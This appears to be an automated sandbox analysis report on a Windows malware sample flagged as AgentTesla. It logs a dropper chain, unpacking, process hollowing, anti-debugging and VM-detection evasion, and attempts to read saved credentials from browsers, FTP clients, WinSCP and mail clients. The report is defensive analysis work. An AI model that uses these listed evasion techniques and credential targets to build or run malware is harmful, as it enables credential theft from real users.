File read: C:\Users\user\Desktop\PO13132021.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\PO13132021.exe 'C:\Users\user\Desktop\PO13132021.exe'
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe C:\Users\user\AppData\Local\Temp\Nla\zfngholtp.s
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe C:\Users\user\AppData\Local\Temp\Nla\zfngholtp.s
Source: C:\Users\user\Desktop\PO13132021.exe	Process created: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe C:\Users\user\AppData\Local\Temp\Nla\zfngholtp.s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe	Process created: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe C:\Users\user\AppData\Local\Temp\Nla\zfngholtp.s	Jump to behavior

Source: C:\Users\user\Desktop\PO13132021.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Source: PO13132021.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wntdll.pdbUGP source: ioqwel.exe, 00000001.00000003.208763622.00000000046A0000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: ioqwel.exe, 00000001.00000003.208763622.00000000046A0000.00000004.00000001.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe

Unpacked PE file: 2.2.tpiyon2.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.gfids:R;.rsrc:R;

Detected unpacking (creates a PE file in dynamic memory)

Show sources

Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe

Unpacked PE file: 2.2.tpiyon2.exe.2810000.3.unpack

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe

Unpacked PE file: 2.2.tpiyon2.exe.400000.0.unpack

Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe

Code function: 1_2_00AC4BAA LoadLibraryA,GetProcAddress,

1_2_00AC4BAA

Source: PO13132021.exe	Static PE information: real checksum: 0x0 should be: 0xbd82c
Source: tpiyon2.exe.1.dr	Static PE information: real checksum: 0xdf890 should be: 0xe835e

Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe	Code function: 1_2_00AD8B75 push ecx; ret	1_2_00AD8B88
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Code function: 2_2_00401F16 push ecx; ret	2_2_00401F29
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Code function: 2_2_0049885A push ss; retf	2_2_0049886B
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Code function: 2_2_00E40AD3 push ss; ret	2_2_00E40AD4
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Code function: 2_2_00E40A09 push ss; ret	2_2_00E40A0A
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Code function: 2_2_00E407AE push 00000018h; ret	2_2_00E407B0
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Code function: 2_2_00E40986 push ss; ret	2_2_00E40988
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Code function: 2_2_00E40923 push ss; ret	2_2_00E40925

Persistence and Installation Behavior:

Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe	File created: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe			Jump to dropped file
Source: C:\Users\user\Desktop\PO13132021.exe	File created: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe			Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe

Code function: 1_2_00AC5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,KiUserCallbackDispatcher,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

1_2_00AC5EDA

Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\PO13132021.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Found evasive API chain (trying to detect sleep duration tampering with parallel thread)

Show sources

Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe

Function Chain: memAlloc,memAlloc,systemQueried,systemQueried,threadCreated,threadResumed,threadDelayed,threadDelayed,threadDelayed,systemQueried,systemQueried,threadDelayed,systemQueried,threadDelayed,systemQueried,threadDelayed,threadDelayed,systemQueried,processQueried,processQueried,threadDelayed,systemQueried,threadDelayed,threadDelayed,systemQueried

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Users\user\Desktop\PO13132021.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe

Window / User API: threadDelayed 608

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe TID: 4696	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe TID: 4696	Thread sleep count: 608 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe TID: 4696	Thread sleep time: -18240000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe TID: 720	Thread sleep count: 69 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe TID: 720	Thread sleep time: -34500s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe TID: 4696	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe TID: 4696	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\PO13132021.exe	Code function: 0_2_004059F0 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_004059F0
Source: C:\Users\user\Desktop\PO13132021.exe	Code function: 0_2_0040659C FindFirstFileA,FindClose,	0_2_0040659C
Source: C:\Users\user\Desktop\PO13132021.exe	Code function: 0_2_004027A1 FindFirstFileA,	0_2_004027A1
Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe	Code function: 1_2_00B1494A GetFileAttributesW,FindFirstFileW,FindClose,	1_2_00B1494A
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Code function: 2_2_00404A29 FindFirstFileExW,	2_2_00404A29

Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe

Code function: 1_2_00AC5D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

1_2_00AC5D13

Source: tpiyon2.exe, 00000002.00000002.588247880.00000000055B0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: tpiyon2.exe, 00000002.00000002.588247880.00000000055B0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: tpiyon2.exe, 00000002.00000002.588247880.00000000055B0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: tpiyon2.exe, 00000002.00000002.583713952.0000000000D56000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: tpiyon2.exe, 00000002.00000002.588247880.00000000055B0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe

Code function: 2_2_00498408 LdrInitializeThunk,

2_2_00498408

Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe

Code function: 1_2_00AC5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

1_2_00AC5240

Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe

Code function: 1_2_00AE5CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

1_2_00AE5CAC

Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe

Code function: 1_2_00AC4BAA LoadLibraryA,GetProcAddress,

1_2_00AC4BAA

Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe

Code function: 2_2_004035F1 mov eax, dword ptr fs:[00000030h]

2_2_004035F1

Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe

Code function: 1_2_00B088CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

1_2_00B088CD

Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe	Code function: 1_2_00ADA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00ADA385
Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe	Code function: 1_2_00ADA354 SetUnhandledExceptionFilter,	1_2_00ADA354
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Code function: 2_2_00401E1D SetUnhandledExceptionFilter,	2_2_00401E1D
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Code function: 2_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0040446F
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Code function: 2_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00401C88
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Code function: 2_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00401F30

Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe

Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe protection: execute and read and write

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe

Section unmapped: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe base address: 400000

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe

Code function: 1_2_00B09369 LogonUserW,

1_2_00B09369

Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe

Code function: 1_2_00AC5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

1_2_00AC5240

Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe

1_2_00AC5EDA

Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe

Process created: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe C:\Users\user\AppData\Local\Temp\Nla\zfngholtp.s

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe

1_2_00B088CD

Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe

Code function: 1_2_00B14F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

1_2_00B14F1C

Source: PO13132021.exe, 00000000.00000002.217222596.00000000028D2000.00000004.00000001.sdmp, ioqwel.exe, 00000001.00000002.214809265.0000000004545000.00000004.00000001.sdmp, tpiyon2.exe, 00000002.00000000.205331022.00000000004B6000.00000002.00020000.sdmp, ioqwel.exe.0.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: tpiyon2.exe, 00000002.00000002.583752944.0000000001200000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: ioqwel.exe, tpiyon2.exe, 00000002.00000002.583752944.0000000001200000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: tpiyon2.exe, 00000002.00000002.583752944.0000000001200000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: tpiyon2.exe, 00000002.00000002.583752944.0000000001200000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe

Code function: 1_2_00AD885B cpuid

1_2_00AD885B

Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe

Code function: 1_2_00AE50B7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

1_2_00AE50B7

Source: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe

Code function: 1_2_00AE416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

1_2_00AE416A

Source: C:\Users\user\Desktop\PO13132021.exe

0_2_00403461

Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000002.00000002.587931278.0000000003E01000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.213456226.00000000032F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.583608219.0000000000CA6000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.582750259.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.583897205.0000000002812000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000001.209476830.0000000000414000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.586869289.0000000002E01000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.583855776.00000000027D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tpiyon2.exe PID: 7028, type: MEMORY
Source: Yara match	File source: Process Memory Space: ioqwel.exe PID: 6996, type: MEMORY
Source: Yara match	File source: 2.2.tpiyon2.exe.2810000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.ioqwel.exe.32f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.tpiyon2.exe.27d0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.tpiyon2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.tpiyon2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.ioqwel.exe.32f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.tpiyon2.exe.27d0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.tpiyon2.exe.400000.0.raw.unpack, type: UNPACKEDPE

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior

Source: Yara match	File source: 00000002.00000002.586869289.0000000002E01000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tpiyon2.exe PID: 7028, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000002.00000002.587931278.0000000003E01000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.213456226.00000000032F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.583608219.0000000000CA6000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.582750259.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.583897205.0000000002812000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000001.209476830.0000000000414000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.586869289.0000000002E01000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.583855776.00000000027D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tpiyon2.exe PID: 7028, type: MEMORY
Source: Yara match	File source: Process Memory Space: ioqwel.exe PID: 6996, type: MEMORY
Source: Yara match	File source: 2.2.tpiyon2.exe.2810000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.ioqwel.exe.32f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.tpiyon2.exe.27d0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.tpiyon2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.tpiyon2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.ioqwel.exe.32f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.tpiyon2.exe.27d0000.2.raw.unpack, type: UNPACKEDPE
